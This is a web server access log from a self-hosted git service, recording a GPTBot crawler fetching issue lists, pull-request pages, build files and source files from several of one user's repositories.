"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:18:05:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:18:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10132] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:18:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:18:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:18:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py?display=source" [Client 74.7.227.38] [Length 29512] [Gzip 8.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:18:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 44116] [Gzip 15.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18925] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16432] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 70891] [Gzip 17.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11633] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 70890] [Gzip 17.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 69333] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16434] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 69335] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 44116] [Gzip 15.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:18:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11079] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11079] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:18:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" -[17/Feb/2026:18:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" -[17/Feb/2026:18:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.02] [Sent-to 192.168.0.250] 